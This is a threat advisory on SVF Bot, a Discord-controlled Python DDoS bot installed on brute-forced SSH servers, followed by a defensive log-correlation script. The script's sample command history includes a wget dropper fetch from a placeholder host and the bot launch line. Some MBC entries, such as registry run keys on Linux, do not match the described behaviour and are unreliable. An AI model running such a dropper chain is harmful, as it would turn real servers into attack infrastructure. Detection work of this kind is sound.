EXECUTIVE SUMMARY:
This advisory describes an attack in which poorly managed Linux servers with SSH exposed to the internet are targeted to install a Python-based DDoS bot called SVF Bot. The threat actor gains access through brute-force or weak credentials, then deploys SVF Bot into a Python virtual environment. Affected environments are internet-facing Linux hosts with SSH exposed, especially those without strong passwords or adequate patching. Once compromised, the server becomes part of a botnet capable of executing coordinated Layer 4 and Layer 7 flood attacks. The business impact is significant: infected assets may be co-opted to launch DDoS attacks against external targets, degrade the defensive posture, cause collateral damage to internal services through resource exhaustion, and potentially carry compliance consequences if the infrastructure is abused for malicious activity.
The attack begins with the threat actor gaining SSH access via weak credentials. They then create a Python virtual environment and install the dependencies (discord, discord.py, requests, aiohttp, lxml) using pip. The SVF Bot binary is retrieved by a dropper script via wget or curl and launched with the -s flag, which defines the botnet group. On startup, the bot authenticates to a Discord C&C using a Bot Token and reports the server group identifier via a webhook. SVF Bot supports a $load command for proxy list retrieval and can execute L7 HTTP floods and L4 UDP floods through validated public proxies. It dynamically scrapes proxy lists, tests connectivity, and selects proxies at random to obscure the attack origin. Additional commands ($restart, $crash, and $stop) allow remote updates and shutdown. The use of Discord as C&C and the proxy-based attack flow are noteworthy TTPs.
The installation of SVF Bot turns compromised Linux servers into modular DDoS infrastructure under external control. Its reliance on widely available proxy pools, a Discord C&C, and a simple command structure makes it both flexible and scalable. While the malware itself is relatively straightforward in design, its novelty lies in leveraging public proxies and a mainstream chat platform for control. In the current threat landscape, this underscores the persistent weakness of SSH-exposed hosts and the continuing trend of legitimate platforms (here Discord) being repurposed for malicious operations.
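As an added defensive example that is not part of this advisory, the following Python script correlates a password-guessing burst in sshd logs with the install chain described above (venv creation, pip install of discord, dropper fetch via wget/curl, launch with -s). The log lines, file paths, dropper host, regexes and failure threshold are all constructed assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sshd lines (not from the advisory): a password-guessing burst, then a
# successful password login from the same address, then an unrelated key-based login.
AUTH_LOG = """\
Jul 10 03:12:01 host sshd[2101]: Failed password for root from 198.51.100.7 port 51000 ssh2
Jul 10 03:12:03 host sshd[2102]: Failed password for admin from 198.51.100.7 port 51002 ssh2
Jul 10 03:12:05 host sshd[2103]: Failed password for root from 198.51.100.7 port 51004 ssh2
Jul 10 03:12:07 host sshd[2104]: Accepted password for root from 198.51.100.7 port 51006 ssh2
Jul 10 03:15:00 host sshd[2200]: Accepted publickey for deploy from 203.0.113.9 port 40000 ssh2
""".splitlines()
# Constructed command history for that session (paths and dropper host are placeholders).
CMD_LOG = """\
python3 -m venv /tmp/.venv
/tmp/.venv/bin/pip install discord discord.py requests aiohttp lxml
wget -q http://DROPPER-HOST-PLACEHOLDER/svf.sh -O /tmp/.svf.sh
/tmp/.venv/bin/python /tmp/.svf.py -s group1
""".splitlines()

FAILED = re.compile(r"Failed password for \S+ from (\S+)")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+)")
# One regex per stage of the install chain the advisory describes (assumed patterns).
STAGES = {
    "venv": re.compile(r"python3? -m venv"),
    "pip_discord": re.compile(r"pip3? install .*\bdiscord\b"),
    "dropper": re.compile(r"^(wget|curl)\b"),
    "bot_launch": re.compile(r"python\S* \S+ -s \S+"),
}

def brute_force_logins(auth_lines, threshold=3):
    """Map source IP -> user for password logins preceded by >= threshold failures from that IP."""
    failures, hits = defaultdict(int), {}
    for line in auth_lines:
        if m := FAILED.search(line):
            failures[m.group(1)] += 1
        elif (m := ACCEPTED.search(line)) and failures[m.group(2)] >= threshold:
            hits[m.group(2)] = m.group(1)
    return hits

def svf_install_stages(cmd_lines):
    """Return the names of the install-chain stages present in the command history."""
    return {name for cmd in cmd_lines for name, rx in STAGES.items() if rx.search(cmd)}

def assess(auth_lines, cmd_lines):
    """Flag the host only when a brute-forced login and the complete install chain coincide."""
    logins, stages = brute_force_logins(auth_lines), svf_install_stages(cmd_lines)
    return {"brute_forced": logins, "stages": sorted(stages),
            "suspect": bool(logins) and set(STAGES) <= stages}
```

Requiring both the brute-forced login and every install stage keeps a lone `pip install discord` on a legitimate developer host from raising an alert; tune the threshold and stage patterns to your own logging sources.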
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
| --- | --- | --- | --- |
| Reconnaissance | T1590 | Gather Victim Host Information | – |
| Resource Development | T1587 | Develop Capabilities | – |
| Initial Access | T1110.001 | Brute Force | Password Guessing |
| Execution | T1059.006 | Command and Scripting Interpreter | Python |
| Defense Evasion | T1564.003 | Hide Artifacts | Hidden Files and Directories |
| Command and Control | T1102.002 | Web Service | Bidirectional Communication |
| Impact | T1498.002 | Network Denial of Service | Reflection Amplification |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| --- | --- | --- |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Anti-Behavioral Analysis | F0001 | Software Packing |
| Collection | E1056 | Input Capture |
| Discovery | E1082 | System Information Discovery |
| Discovery | E1083 | File and Directory Discovery |
| Command and Control | B0030 | C2 Communication |
REFERENCES:
The following reports contain further technical details: